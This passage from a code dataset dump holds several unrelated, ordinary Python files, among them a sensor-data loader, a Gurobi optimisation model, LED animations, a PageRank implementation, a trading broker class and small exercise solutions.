'd14validation.csv', 'd16validation.csv', 'd17validation.csv', 'd18validation.csv', 'd19validation.csv',\r\n 'd20validation.csv']\r\n for Datapath in dpath:\r\n\r\n dDatapath = os.path.join(filepath, Datapath)\r\n\r\n if Datapath == 
'd00validation.csv':\r\n\r\n data = np.loadtxt(dDatapath, dtype=np.float32, delimiter=',')\r\n samples_Nocomp = data\r\n\r\n else:\r\n\r\n data = np.loadtxt(dDatapath, dtype=np.float32, delimiter=',')\r\n samples_Nocomp = data\r\n\r\n # samples_Nocomp = stdsc_00.transform(samples_Nocomp)\r\n # samples_Nocomp = mms_00.fit_transform(samples_Nocomp)\r\n\r\n # samples_Nocomp = samples_Nocomp[160:, :]\r\n DATA.append(samples_Nocomp)\r\n label = i * np.ones(samples_Nocomp.shape[0])\r\n LABEL.append(label)\r\n i += 1\r\n\r\n data_TE_valid = np.concatenate(np.array(DATA), axis=0)\r\n label_TE_valid_s = np.concatenate(np.array(LABEL), axis=0)\r\n stdsc = StandardScaler()\r\n mms = MinMaxScaler()\r\n # data_TE_train = mms.fit_transform(data_TE_train)\r\n\r\n data_TE_train = stdsc.fit_transform(data_TE_train)\r\n data_TE_test = stdsc.transform(data_TE_test)\r\n data_TE_valid = stdsc.transform(data_TE_valid)\r\n\r\n\r\n\r\n # data_TE_test = mms.transform(data_TE_test)\r\n\r\n\r\n\r\n\r\n if window==True:\r\n samplenum = []\r\n samplenum.append(0)\r\n orglendata = []\r\n data_w_train = []\r\n label_w_train =[]\r\n for i in range(len(dpath)):\r\n\r\n samplenum.append(np.sum(label_TE_train_s==i)+samplenum[i])\r\n orglendata.append(data_TE_train[samplenum[i]:samplenum[i+1]])\r\n for i in range(len(orglendata)):\r\n single = np.array(orglendata[i]).reshape(-1,52)\r\n Data = timewindow(single, windowlength=windowl)\r\n label = i * np.ones(Data.shape[0])\r\n data_w_train.append(Data)\r\n label_w_train.append(label)\r\n data_TE_train = np.concatenate(np.array(data_w_train), axis=0)\r\n # data_TE_train = stdsc_00.fit_transform(data_TE_train)\r\n label_TE_train = np.concatenate(np.array(label_w_train), axis=0)\r\n samplenum = []\r\n samplenum.append(0)\r\n orglendata = []\r\n data_w_test = []\r\n label_w_test = []\r\n for i in range(len(dpath)):\r\n samplenum.append(np.sum(label_TE_test_s == i) + samplenum[i])\r\n orglendata.append(data_TE_test[samplenum[i]:samplenum[i + 1]])\r\n for i in range(len(orglendata)):\r\n single = np.array(orglendata[i]).reshape(-1, 52)\r\n Data = timewindow(single, windowlength=windowl)\r\n label = i * np.ones(Data.shape[0])\r\n data_w_test.append(Data)\r\n label_w_test.append(label)\r\n data_TE_test = np.concatenate(np.array(data_w_test), axis=0)\r\n # data_TE_test = stdsc_00.fit_transform(data_TE_test)\r\n label_TE_test = np.concatenate(np.array(label_w_test), axis=0)\r\n samplenum = []\r\n samplenum.append(0)\r\n orglendata = []\r\n data_w_valid = []\r\n label_w_valid = []\r\n for i in range(len(dpath)):\r\n samplenum.append(np.sum(label_TE_valid_s == i) + samplenum[i])\r\n orglendata.append(data_TE_valid[samplenum[i]:samplenum[i + 1]])\r\n for i in range(len(orglendata)):\r\n single = np.array(orglendata[i]).reshape(-1, 52)\r\n Data = timewindow(single, windowlength=windowl)\r\n label = i * np.ones(Data.shape[0])\r\n data_w_valid.append(Data)\r\n label_w_valid.append(label)\r\n data_TE_valid = np.concatenate(np.array(data_w_valid), axis=0)\r\n # data_TE_test = stdsc_00.fit_transform(data_TE_test)\r\n label_TE_valid = np.concatenate(np.array(label_w_valid), axis=0)\r\n else:\r\n data_TE_train = data_TE_train\r\n label_TE_train = label_TE_train_s\r\n data_TE_test = data_TE_test\r\n label_TE_test = label_TE_test_s\r\n data_TE_valid = data_TE_valid\r\n label_TE_valid = label_TE_valid_s\r\n\r\n if IS_TRAIN == 'Train':\r\n data_TE_T = torch.tensor(data_TE_train).float()\r\n label_TE_T = torch.tensor(label_TE_train).long()\r\n dataloader = DataLoader(TensorDataset(data_TE_T, 
label_TE_T), batch_size=batch_size, shuffle=True,\r\n num_workers=1)\r\n return data_TE_train,label_TE_train, dataloader\r\n elif IS_TRAIN == 'Test':\r\n data_TE_T = torch.tensor(data_TE_test).float()\r\n label_TE_T = torch.tensor(label_TE_test).long()\r\n dataloader = DataLoader(TensorDataset(data_TE_T, label_TE_T), batch_size=batch_size, shuffle=False,\r\n num_workers=1)\r\n return data_TE_test, label_TE_test, dataloader\r\n elif IS_TRAIN == 'Valid':\r\n data_TE_T = torch.tensor(data_TE_valid).float()\r\n label_TE_T = torch.tensor(label_TE_valid).long()\r\n dataloader = DataLoader(TensorDataset(data_TE_T, label_TE_T), batch_size=batch_size, shuffle=False,\r\n num_workers=1)\r\n return data_TE_valid, label_TE_valid, dataloader\r\n\r\n\r\n\r\n\r\n# a = readFile(IS_TRAIN=False,batch_size=20,window=True,windowl=20)\r\n","repo_name":"heyumi0901/MBTCN","sub_path":"datapro.py","file_name":"datapro.py","file_ext":"py","file_size_in_byte":9518,"program_lang":"python","lang":"en","doc_type":"code","stars":2,"dataset":"github-code","pt":"44"} +{"seq_id":"73022648772","text":"# -*- coding: utf-8 -*-\nimport gurobipy as gp\nimport numpy as np\nfrom gurobipy import *\nfrom numpy import linalg as LA\nimport sys\nimport struct\nfrom log import danoLogger\nfrom myutils import breakexit, askfordouble\nimport time\n\n\n\ndef lalift(alldata, liftingvariablename, vectordictionary): #distset_index):\n log = alldata['log']\n\n global MYDEBUG\n MYDEBUG = False\n\n\n # For now, in each iteration we will formulate and solve a new problem\n # The problem will consider a given binary variable: z_j\n # Given (x*, y*, z*) = target, the problem will compute the minimum distance from (x*,y*,z*) to the\n # projection, in (x,y,z) space, of the z_j - convexified lifted formulation of the problem,\n # That is to say, the convex hull of feasible solutions where z_j = 0 or 1.\n\n # The output is the nearest point to (x*,y*,z*) in the projection of the lifted formulation to (x,y,z) space.\n\n # liftingvariablename is the name of the binary variable being disjuncted\n # vectordictionary is a dictionary, indexed by variable name, containing\n # (x*, y*, z*)\n\n # The formulation in the lifted space will have four parts:\n # (a) A copy of the formulation multiplied by z_j and linearized; corresponding to z_j = 1.\n # (b) A copy of the formulation multiplied by 1-z_j and linearized; corresponding to z_j = 0.\n # (c) A constraint saying that (x,y,z) = (x1, y1, z1) + (x0, y0, z0), where the \"1\" or \"0\".\n # refers to the vector in (a) or (b), respectively.\n # (d) Have to handle individual variable bounds.\n # (e) Constraints and variables used to model the distance between (x,y,z) and (x*,y*,z*).\n\n \n # For (a) and (b) we will use the same code, where the \"1\" and \"0\" case are distinguished\n # using a flag. 
We need logic so as to\n\n #\n\n # (1) in the zero case, we need to \n # Keep track of the variables that are in set S_j (lhs coefficient becomes zero).\n # Appropriately handle rhs (e.g., >= 5 becomes 5 z_j >= 5).\n # Appropriately handle cardinality constraint.\n\n # (2) In the one case, \n # Appropriately handle rhs (e.g., >= 5 becomes -5 z_j >= 0).\n # Appropriately handle cardinality constraint.\n\n #\n\n # To help with this, varclass is used to keep track of the nature of variables\n # 'indicator' (binary), 'distance_sum' (y variable) and 'groundset' (x variable).\n\n\n distcount = alldata['distcount']\n distsize = alldata['distsize']\n distvarset = alldata['distvarset']\n distvar_owner = alldata['distvar_owner'] \n distvar_partner = alldata['distvar_partner']\n distconstr = alldata['distconstr']\n varSet = alldata['varSet']\n distset_byname = alldata['distset_byname']\n\n model = alldata['model']\n\n liftingvariable = model.getVarByName(liftingvariablename)\n distset_index = distset_byname[liftingvariablename]\n #liftingvariable = distvar_owner[distset_index]\n log.joint('Lifting using set %d variable %s\\n' %(distset_index, liftingvariable.varname))\n\n Dmodel = Model('disjunctmodel')\n\n # First we will create the variables used in the disjunction: \"_0\" and \"_1\".\n # Say that the lifting variable is z. Given another variable w, we write\n # w_1 to denote the linearized z*w and w_0 to denote the linearized (1 - z)*w\n # We also write: z_1 to model z and z_0 to model 1 - z\n #\n # We run through all variables in the original model and we create the _0 and _1 lifted variables,\n # as well as a copy of the variable itself (which we do first first)\n\n target = {}\n \n # hack code for giving an arbitrary value to the target\n #j = 0\n #for var in model.getVars():\n # j += 1\n # target[var.Varname] = j\n\n\n target = vectordictionary\n\n for var in model.getVars():\n Dmodel.addVar(obj = 0.0, lb = var.lb, ub = var.ub, name = var.varname)\n for DisjunctionCase in range(2):\n for var in model.getVars():\n newname = var.varname + '_' + str(DisjunctionCase)\n #if newname[0] == 'b': print(newname)\n if var.varname == liftingvariablename:\n print(newname)\n thisub = var.ub\n thislb = var.lb\n\n if varSet[var.varname] == liftingvariable.varname and DisjunctionCase == 0:\n thislb = thisub = 0\n Dmodel.addVar(obj = 0.0, lb = thislb, ub = thisub, name = newname)\n\n # This needs to be fixed. 
In the 0 case, the x and y variables that belong to the set for the lifting variable\n # should be set to zero\n\n # there is some waste in this, in particular in terms of the lifting variable, but it's OK for now\n\n #\n Dmodel.update()\n \n constrs = model.getConstrs()\n Qconstrs = model.getQConstrs()\n \n for DisjunctionCase in range(2):\n Dliftingvariable = Dmodel.getVarByName(liftingvariable.Varname+'_'+str(DisjunctionCase))\n\n # First, linear constraints.\n \n for constr in constrs:\n expr = LinExpr() #the new constraint\n \n lhs = model.getRow(constr)\n exprSize = lhs.size()\n for k in range(exprSize): \n actualVar = lhs.getVar(k)\n #print(actualVar.Varname)\n liftedvar = Dmodel.getVarByName(actualVar.Varname+'_'+str(DisjunctionCase))\n \n coefficient = lhs.getCoeff(k)\n\n if actualVar.Varname == liftingvariable.Varname and DisjunctionCase == 0:\n coefficient = 0\n \n expr += coefficient*liftedvar\n\n rhsval = constr.RHS\n expr -= rhsval*Dliftingvariable\n\n #print(constr.ConstrName)\n #print(expr)\n if constr.Sense == '=': \n Dmodel.addConstr(expr == 0, name = constr.ConstrName + '_' + str(DisjunctionCase))\n elif constr.Sense == '>': \n Dmodel.addConstr(expr >= 0, name = constr.ConstrName + '_' + str(DisjunctionCase))\n elif constr.Sense == '<': \n Dmodel.addConstr(expr <= 0, name = constr.ConstrName + '_' + str(DisjunctionCase))\n \n # Next, quadratic constraints. The code only handles the case of pure quadratics.\n\n for Qconstr in Qconstrs: \n Qlhs = model.getQCRow(Qconstr) # The lhs is in QuadExpr() format. \n QExprSize = Qlhs.size() # This counts the number of quadratic terms.\n Dqexpr = QuadExpr()\n for k in range(QExprSize): \n actualVar1 = Qlhs.getVar1(k)\n actualVar2 = Qlhs.getVar2(k)\n Qcoeff = Qlhs.getCoeff(k)\n \n var1InQExpr = Dmodel.getVarByName(actualVar1.varname + '_' + str(DisjunctionCase))\n var2InQExpr = Dmodel.getVarByName(actualVar2.varname + '_' + str(DisjunctionCase))\n Dqexpr += Qcoeff*var1InQExpr*var2InQExpr\n\n\n Qrhsval = Qconstr.QCRHS\n if Qconstr.QCSense == '=': \n Dmodel.addQConstr(Dqexpr == Qrhsval, name = Qconstr.QCName + '_' + str(DisjunctionCase))\n elif Qconstr.QCSense == '>': \n Dmodel.addQConstr(Dqexpr >= Qrhsval, name = Qconstr.QCName + '_' + str(DisjunctionCase))\n elif Qconstr.QCSense == '<': \n Dmodel.addQConstr(Dqexpr <= Qrhsval, name = Qconstr.QCName + '_' + str(DisjunctionCase))\n\n \n Dmodel.update()\n\n # Now add constraints that effect the disjunction, i.e., for every variable v we write v = v_0 + v_1.\n\n for var in model.getVars():\n var1 = Dmodel.getVarByName(var.Varname+'_1')\n var0 = Dmodel.getVarByName(var.Varname+'_0')\n varvar = Dmodel.getVarByName(var.Varname)\n if var.Varname != liftingvariable.Varname:\n Dmodel.addConstr(varvar == var0 + var1, name = 'Dis_'+var.Varname)\n else:\n Dmodel.addConstr(varvar == var1, name = 'Lambda1')\n Dmodel.addConstr(var1 + var0 == 1, name = 'SumLambda')\n\n\n # Now let's add objective.\n distance2 = QuadExpr()\n for var in model.getVars():\n varvar = Dmodel.getVarByName(var.Varname)\n distance2 += (varvar - target[var.varname])**2\n\n\n Dmodel.setObjective(distance2, GRB.MINIMIZE)\n \n Dmodel.write('D.lp')\n\n\n breakexit('lalifted')\n","repo_name":"derdano/lpanalyze","sub_path":"lalift.py","file_name":"lalift.py","file_ext":"py","file_size_in_byte":8255,"program_lang":"python","lang":"en","doc_type":"code","stars":0,"dataset":"github-code","pt":"44"} +{"seq_id":"27543142376","text":"# https://www.youtube.com/watch?v=PXMJ6FS7llk\n\nfrom BaseMethods import BaseMethods\n\n\ndef 
print_options():\n print(\"1. Get simpson html data with pandas\")\n print(\"2. Get football csv data with pandas\")\n print(\"3. Get tables from pdf with camelot\")\n print(\"4. Web automation and web scraping: html tags - XPath\")\n print(\"5. Web automation and web scraping: headless mode\")\n print(\"6. Pivot tables with pandas\")\n print(\"7. Excel Add a bar chart\")\n print(\"8. Automate Whatsapp\")\n print(\"\")\n\n\ndef get_and_execute():\n\n options = {\n 1: BaseMethods.get_simpson_html_data_with_pandas,\n 2: BaseMethods.get_csv_data_from_website,\n 3: BaseMethods.extract_table_from_pdf,\n 4: BaseMethods.web_automation,\n 5: BaseMethods.web_automation_headless_mode,\n 6: BaseMethods.pivot_tables_excel,\n 7: BaseMethods.excel_add_bar_chart,\n 8: BaseMethods.automate_whatsapp,\n }\n option_number = int(input(\"Choose: \"))\n option = options.get(option_number)\n option()\n\n\n# Press the green button in the gutter to run the script.\nif __name__ == '__main__':\n print_options()\n get_and_execute()\n\n# See PyCharm help at https://www.jetbrains.com/help/pycharm/\n","repo_name":"MarcinEt92/Various","sub_path":"AutomateBoringStuff/Main.py","file_name":"Main.py","file_ext":"py","file_size_in_byte":1224,"program_lang":"python","lang":"en","doc_type":"code","stars":0,"dataset":"github-code","pt":"44"} +{"seq_id":"16114505220","text":"'''\nMaria plays games of college basketball in a season. Because she wants to go pro, she tracks her points scored per game sequentially in an array defined as . After each game , she checks to see if score breaks her record for most or least points scored so far during that season.\n\nGiven Maria's array of for a season of games, find and print the number of times she breaks her record for most and least points scored during the season.\n\nNote: Assume her records for most and least points at the start of the season are the number of points scored during the first game of the season.\nimport sys\n\ndef breakingRecords(score):\n # Complete this function\n\nif __name__ == \"__main__\":\n n = int(input().strip())\n score = list(map(int, input().strip().split(' ')))\n result = breakingRecords(score)\n print (\" \".join(map(str, result)))\n\nInput (stdin)\n9\n10 5 20 20 4 5 2 25 1\nYour Output (stdout)\n2 4\nExpected Output\n2 4\n\n'''\n\n#!/bin/python3\n\n\nx,n = input(), list(map(int, input().split()))\nxmax = xmin = n[0]\nxcmax = xcmin = 0\n\n# highest and lowest scores\nfor ni in n:\n if ni < xmin:\n xcmin += 1\n xmin = ni \n elif ni > xmax:\n xcmax += 1\n xmax = ni \n\nprint(xcmax, xcmin)\n\n\n","repo_name":"menquist/Michael_Enquist","sub_path":"Python/Hackerrank/Implementation - Breaking the records.py","file_name":"Implementation - Breaking the records.py","file_ext":"py","file_size_in_byte":1218,"program_lang":"python","lang":"en","doc_type":"code","stars":3,"dataset":"github-code","pt":"44"} +{"seq_id":"10455705639","text":"from org.openpnp.util.UiUtils import submitUiMachineTask\n\n# boiler plate to get access to psypnp modules, outside scripts/ dir\nimport os.path\nimport sys\npython_scripts_folder = os.path.join(scripting.getScriptsDirectory().toString(),\n '..', 'lib')\nsys.path.append(python_scripts_folder)\n\n# setup globals for modules\nimport psypnp.globals\npsypnp.globals.setup(machine, config, scripting, gui)\n\n############## /BOILER PLATE #################\n\n\n\n#from __future__ import absolute_import, division\n\nfrom org.openpnp.util import MovableUtils\nfrom org.openpnp.model import LengthUnit, Location\n\nimport psypnp \nimport 
psypnp.ui\n\n\n\n\ndef main():\n if psypnp.should_proceed_with_motion():\n submitUiMachineTask(go_cam)\n\n\n\ndef go_cam():\n \n \n if machine.defaultHead is None:\n # too weird\n return # should error\n \n defNozz = machine.defaultHead.getDefaultNozzle()\n if defNozz is None:\n return # should error\n \n \n loc = get_coords(defNozz)\n if loc is None:\n # cancel\n return\n MovableUtils.moveToLocationAtSafeZ(defNozz, loc)\n\n\ndef get_coords(nozz):\n curloc = nozz.location\n xval = psypnp.ui.getUserInputFloat(\"X\", curloc.getX())\n if xval is None:\n # cancel\n return None\n yval = psypnp.ui.getUserInputFloat(\"Y\", curloc.getY())\n if yval is None:\n # cancel\n return None\n\n location = Location(LengthUnit.Millimeters, xval, yval, curloc.getZ(), \n curloc.getRotation());\n \n return location\n\nmain()\n","repo_name":"psychogenic/psypnp","sub_path":"scripts/go/noz_absolute.py","file_name":"noz_absolute.py","file_ext":"py","file_size_in_byte":1585,"program_lang":"python","lang":"en","doc_type":"code","stars":21,"dataset":"github-code","pt":"44"} +{"seq_id":"18023802573","text":"\"\"\" CircuitPython sample code based on Adafruit's Simple FancyLED\n example for NeoPixel strip\n\"\"\"\n\nimport board\nimport time\nimport neopixel\nimport adafruit_fancyled.adafruit_fancyled as fancy\nimport adafruit_fancyled.fastled_helpers as helper\n\nnum_leds = 40\nhalf_leds = num_leds//2\nquarter_leds = num_leds//4\n\n# Declare a 6-element RGB rainbow palette\npalette = [\n fancy.CRGB(1.0, 0.0, 0.0), # Red\n fancy.CRGB(0.5, 0.5, 0.0), # Yellow\n fancy.CRGB(0.0, 1.0, 0.0), # Green\n fancy.CRGB(0.0, 0.5, 0.5), # Cyan\n fancy.CRGB(0.0, 0.0, 1.0), # Blue\n fancy.CRGB(0.5, 0.0, 0.5), # Magenta\n]\n\n\nheatmap_gp = bytes([\n 0, 255, 255, 255, # White\n 64, 255, 255, 0, # Yellow\n 128, 255, 0, 0, # Red\n 255, 0, 0, 0]) # Black\n# fmt: on\n\nocean_gp = bytes([\n 0, 255, 255, 255, # white\n 64, 0, 0, 255, # blue\n 128, 0, 255, 255, # cyan\n 192, 0, 255, 0, # green\n 255, 0, 0, 0]) # black\n\n# Convert the gradient palette into a normal palette w/16 elements:\nheat_palette = helper.loadDynamicGradientPalette(heatmap_gp, 16)\nocean_palette = helper.loadDynamicGradientPalette(ocean_gp, 16)\n\n\n# Declare a NeoPixel object on pin D6 with num_leds pixels, no auto-write.\n# Set brightness to max because we'll be using FancyLED's brightness control.\npixels = neopixel.NeoPixel(board.D6, num_leds, brightness=1.0, auto_write=False)\n\noffset = 0 # Positional offset into color palette to get it to 'spin'\nheat_offset = 0\n\ndef rainbow_flush(delay=.02):\n global offset\n for i in range(num_leds):\n # Load each pixel's color from the palette using an offset, run it\n # through the gamma function, pack RGB value and assign to pixel.\n color = fancy.palette_lookup(palette, offset + i / num_leds)\n color = fancy.gamma_adjust(color, brightness=0.25)\n pixels[i] = color.pack()\n pixels.show()\n time.sleep(delay)\n offset += 0.02 # Bigger number = faster spin\n\n\ndef heat_animation(delay=0.02):\n global heat_offset\n for i in range(num_leds):\n # Load each pixel's color from the palette. FastLED uses 16-step\n # in-between blending...so for a 16-color palette, there's 256\n # steps total. 
With 10 pixels, multiply the pixel index by 25.5\n # (and add our offset) to get FastLED-style palette position.\n color = helper.ColorFromPalette(heat_palette, int(heat_offset + i * 25.5), blend=True)\n# color = helper.ColorFromPalette(ocean_palette, int(heat_offset + i * 6.375), blend=True)\n # Apply gamma using the FastLED helper syntax\n color = helper.applyGamma_video(color)\n # 'Pack' color and assign to NeoPixel #i\n pixels[i] = color.pack()\n pixels.show()\n time.sleep(delay)\n heat_offset += 8 # Bigger number = faster spin\n\ndef simple_rainbow(delay = .03):\n global offset\n num_steps = 4\n for i in range(num_steps):\n color = fancy.palette_lookup(palette, offset + i / num_steps)\n color = fancy.gamma_adjust(color, brightness=0.25)\n col = color.pack()\n nleds = num_leds//num_steps\n start = i*nleds\n for j in range(start,start+nleds,1):\n pixels[j] = col\n\n pixels.show()\n offset += .02\n time.sleep(delay)\n\ndef opposite(n):\n if ((n//10) % 2):\n return 49 - n\n else:\n return 29 - n\n\nwalk_index = 0\ndef simple_walk(delay=0.05):\n global walk_index, offset\n\n trail_length = 4\n color = fancy.palette_lookup(palette, offset)\n oppcol = fancy.palette_lookup(palette, offset+0.5)\n for i in range(trail_length):\n index = (walk_index + i) % num_leds\n index2 = (index + 10) % num_leds\n opp_index = opposite(index)\n opp_index2 = opposite(index2)\n bright = 1.0/(trail_length - i)\n pixels[index] = fancy.gamma_adjust(color, brightness = bright).pack()\n pixels[opp_index] = pixels[index]\n pixels[index2] = fancy.gamma_adjust(oppcol, brightness = bright).pack()\n pixels[opp_index2] = pixels[index2]\n pixels.show()\n time.sleep(delay)\n pixels[walk_index] = (0,0,0)\n pixels[opposite(walk_index)] = (0,0,0)\n index2 = (walk_index + 10) % num_leds\n pixels[index2] = (0,0,0)\n pixels[opposite(index2)] = (0,0,0)\n walk_index = (walk_index + 1) % num_leds\n offset = offset + .02\n\n\n\ncurrent_animation = 0\nlast_switch_time = time.monotonic()\nanimation_run_time = 5\nanims = [heat_animation, rainbow_flush, simple_rainbow, simple_walk]\n\nwhile True:\n if (time.monotonic() - last_switch_time) > animation_run_time:\n current_animation = (current_animation + 1) % len(anims)\n pixels.fill((0,0,0))\n last_switch_time = time.monotonic()\n anims[current_animation]()","repo_name":"geekmomprojects/fiber-optic-hyperbolic-paraboloid","sub_path":"CircuitPython/parabolic_hyperboloid.py","file_name":"parabolic_hyperboloid.py","file_ext":"py","file_size_in_byte":4689,"program_lang":"python","lang":"en","doc_type":"code","stars":4,"dataset":"github-code","pt":"44"} +{"seq_id":"41627199585","text":"import matplotlib.pyplot as plt\nimport networkx as nx\n\n\ndef page_rank(g, d=0.7, pers_vector=None,\n max_iterations=100, err_tolerance=1.0e-6, starting_val=None, weight=None,\n dangling=None):\n \"\"\"\"\n !!!!!\n We used NetworkX - a Python package for the creation,\n manipulation, and study of the structure, dynamics, and functions of complex networks.\n !!!!!\n Parameters Explanation:\n !!!!!\n g(graph) :\n A NetworkX graph.\n Every Un-directed graph will be converted to a directed\n graph, with two directed edges for each un-directed edge.\n\n d(float) :\n Damping parameter for PageRank.\n Default value is 0.7.\n\n pers_vector(dictionary) :\n The pers_vector consisting of a dictionary with a\n key for every node in the graph\n and non-zero personalization value for each node.\n Default value is a uniform distribution.\n\n max_iterations(integer) :\n Maximum number of iterations in power method eigenvalue 
solver.\n Default value is 100.\n\n err_tolerance(float) :\n Error tolerance used to check convergence in power method solver.\n Default value is 1.0e-6.\n\n starting_val(dictionary) :\n Starting value of Page Rank iteration for each node in the graph.\n Default value is None.\n\n weight(key) :\n Edge data key to use as weight.\n If None weights are set to 1.\n\n dangling(dictionary) :\n The out edges to be assigned to any \"dangling\" nodes\n The dict key is the node the out edge points to and the dict\n value is the weight of that out edge.\n By default, dangling nodes are given\n out edges according to the pers vector (uniform if not specified).\n This must be selected to result in an irreducible transition\n matrix.\n It may be common to have the dangling dict\n to be the same as the pers vector.\n !!!!!\n Returns dictionary\n !!!!!\n Dictionary of nodes with PageRank as value.\n !!!!!\n\n \"\"\"\n if len(g) == 0:\n return {}\n if not g.is_directed():\n directed_graph = g.to_directed()\n else:\n directed_graph = g\n w = nx.stochastic_graph(directed_graph, weight=weight) # Create a copy in stochastic form\n n = w.number_of_nodes()\n if starting_val is None:\n x = dict.fromkeys(w, 1.0 / n) # Choose fixed starting vector if not given\n else:\n s = float(sum(starting_val.values())) # Normalized starting_val vector\n x = dict((k, v / s) for k, v in starting_val.items())\n if pers_vector is None:\n p = dict.fromkeys(w, 1.0 / n) # Assign uniform vector if not given\n else:\n missing = set(g) - set(pers_vector)\n if missing:\n raise nx.NetworkXError('pers dictionary must have a value for every node. Missing nodes %s' % missing)\n s = float(sum(pers_vector.values()))\n p = dict((k, v / s) for k, v in pers_vector.items())\n if dangling is None:\n dangling_weights = p # Use pers vector if dangling vector not specified\n else:\n missing = set(g) - set(dangling)\n if missing:\n raise nx.NetworkXError('Dangling node dictionary must have a value for every node. Missing nodes %s' % missing)\n s = float(sum(dangling.values()))\n dangling_weights = dict((k, v / s) for k, v in dangling.items())\n dangling_nodes = [n for n in w if w.out_degree(n, weight=weight) == 0.0]\n for _ in range(max_iterations): # power iteration: make up to max_iter iterations\n xlast = x\n x = dict.fromkeys(xlast.keys(), 0)\n danglesum = d * sum(xlast[n] for n in dangling_nodes)\n for n in x:\n for nbr in w[n]: # this matrix multiply looks odd because it is doing a left multiply x^T=xlast^T*w\n x[nbr] += d * xlast[n] * w[n][nbr][weight]\n x[n] += danglesum * dangling_weights[n] + (1.0 - d) * p[n]\n err = sum([abs(x[n] - xlast[n]) for n in x]) # check convergence\n if err < n * err_tolerance:\n return x\n raise nx.NetworkXError('page rank: power iteration failed to converge in %d iterations.' % max_iterations)\n\n\nG = nx.barabasi_albert_graph(30, 15) # 30 is the number of nodes , 15 is the number of edges to attach from a new node to existing nodes\npage_rank_values = page_rank(G, 0.7) # 0.7 is the damping parameter\nprint(\"Page Rank Results:\")\nfor pr in page_rank_values.values():\n print(pr)\n\nnx.draw(G) # This is our graph\nplt.show()\n\n\n\"\"\"\nPageRank computes a ranking of the nodes in the graph G based on\n the structure of the incoming links. It was originally designed as\n an algorithm to rank web pages.\n Return the PageRank of the nodes in the graph.\n Notes\n -----\n The eigenvector calculation is done by the power iteration method\n and has no guarantee of convergence. 
The iteration will stop\n after max_iter iterations or an error tolerance of\n number_of_nodes(G)*tol has been reached.\n\n The PageRank algorithm was designed for directed graphs but this\n algorithm does not check if the input graph is directed and will\n execute on undirected graphs by converting each edge in the\n directed graph to two edges.\n\n stochastic graph is a right-stochastic graph is a weighted digraph in which for each\n node, the sum of the weights of all the out-edges of that node is\n 1. If the graph is already weighted (for example, via a 'weight'\n edge attribute), the reweighting takes that into account. \"\"\"\n\n","repo_name":"daniellelagziel/PageRank","sub_path":"page_rank.py","file_name":"page_rank.py","file_ext":"py","file_size_in_byte":5475,"program_lang":"python","lang":"en","doc_type":"code","stars":0,"dataset":"github-code","pt":"44"} +{"seq_id":"5705300050","text":"import math\nfrom decimal import Decimal\nfrom typing import Dict\n\nfrom src.bo.inventory_bo import InventoryBO\nfrom src.constants import ZERO\n\n\nclass BrokerBO:\n\n def __init__(self, cash: Decimal, fee: Decimal, inventory: Dict[str, InventoryBO] = None) -> None:\n self._cash: Decimal = cash\n self.__fee: Decimal = fee\n self.__inventory: Dict[str, InventoryBO] = dict() if inventory is None else inventory\n\n @property\n def cash(self):\n return self._cash\n\n @property\n def inventory(self):\n return self.__inventory\n\n def update(self, ticker: str, price: Decimal) -> None:\n if not math.isnan(price):\n entry: InventoryBO = self.__inventory.get(ticker, InventoryBO(ZERO, price))\n entry.price = price\n self.__inventory[ticker] = entry\n\n def buy(self, ticker: str, price: Decimal, number: Decimal) -> bool:\n total_price: Decimal = price * number\n if self._cash >= total_price and number > 0:\n entry: InventoryBO = self.__inventory.get(ticker, InventoryBO(ZERO, price))\n entry.number += number\n entry.price = price\n self.__inventory[ticker] = entry\n self._cash = self._cash - total_price - self.__fee\n return True\n return False\n\n def sell(self, ticker: str, price: Decimal, number: Decimal) -> bool:\n total_price: Decimal = price * number\n entry: InventoryBO = self.__inventory.get(ticker, InventoryBO(ZERO, price))\n if entry.number >= number > 0:\n entry.number -= number\n entry.price = price\n self.__inventory[ticker] = entry\n self._cash = self._cash + total_price - self.__fee\n return True\n return False\n\n def funds(self) -> Decimal:\n value: Decimal = ZERO\n for ticker in self.__inventory:\n value += self.__inventory[ticker].value()\n return self._cash + value\n","repo_name":"webclinic017/trading-bot-20","sub_path":"src/bo/broker_bo.py","file_name":"broker_bo.py","file_ext":"py","file_size_in_byte":1953,"program_lang":"python","lang":"en","doc_type":"code","stars":0,"dataset":"github-code","pt":"44"} +{"seq_id":"32641383704","text":"import random\n\n\nclass Person:\n def __init__(self, name, house, satiety=50):\n self.Name = name\n self.Satiety = satiety\n self.House = house\n\n def eat(self):\n self.Satiety += 1\n self.House.Eat -= 1\n\n def work(self):\n self.Satiety -= 1\n self.House.Eat += 1\n\n def play(self):\n self.Satiety -= 1\n\n def go_to_the_store(self):\n self.House.Eat += 1\n self.House.Money -= 1\n\n\nclass House:\n def __init__(self, eat=50, money=0):\n self.Eat = eat\n self.Money = money\n\n\ndef action(person, act):\n if person.Satiety < 20:\n person.eat()\n elif person.House.Eat < 10:\n person.go_to_the_store()\n elif person.House.Money < 50:\n person.work()\n elif 
act == 1:\n person.work()\n elif act == 2:\n person.eat()\n else:\n person.play()\n\n\nhouse1 = House()\nperson1 = Person(\"Artem\", house1)\nperson2 = Person(\"No name\", house1)\n\nfor _ in range(365):\n action1 = random.randint(1, 6)\n action2 = random.randint(1, 6)\n\n action(person1, action1)\n action(person2, action2)\n\n if person1.Satiety < 0:\n print(f\"{person1.Name} died\")\n break\n else:\n print(f\"{person1.Name} - {person1.Satiety}\")\n if person2.Satiety < 0:\n print(f\"{person2.Name} died\")\n break\n else:\n print(f\"{person2.Name} - {person2.Satiety}\")\n\n# зачтено\n","repo_name":"KuranovaPolina/Skillbox_Python_homework","sub_path":"Module24/07_cohabitation/main.py","file_name":"main.py","file_ext":"py","file_size_in_byte":1409,"program_lang":"python","lang":"en","doc_type":"code","stars":0,"dataset":"github-code","pt":"44"} +{"seq_id":"2125429310","text":"import math\r\nimport torch\r\nimport torch.nn as nn\r\nimport torch.nn.functional as F\r\nimport utils\r\n\r\n\r\nclass FeatureEmbedding(nn.Module):\r\n def __init__(self, emb_f_size):\r\n super(FeatureEmbedding, self).__init__()\r\n self.emb_f = nn.Embedding(34, emb_f_size)\r\n\r\n def forward(self, f_idx):\r\n emb_out = self.emb_f(f_idx)\r\n return emb_out\r\n\r\n\r\nclass ValueTimeEmbedding(nn.Module):\r\n def __init__(self, input_v_size, emb_v_size, proj_e_size):\r\n super(ValueTimeEmbedding, self).__init__()\r\n self.input_v_size = input_v_size\r\n for i in range(input_v_size):\r\n setattr(self, \"emb_v1_\" + str(i + 1), nn.Linear(1, int(math.sqrt(emb_v_size))))\r\n setattr(self, \"emb_v2_\" + 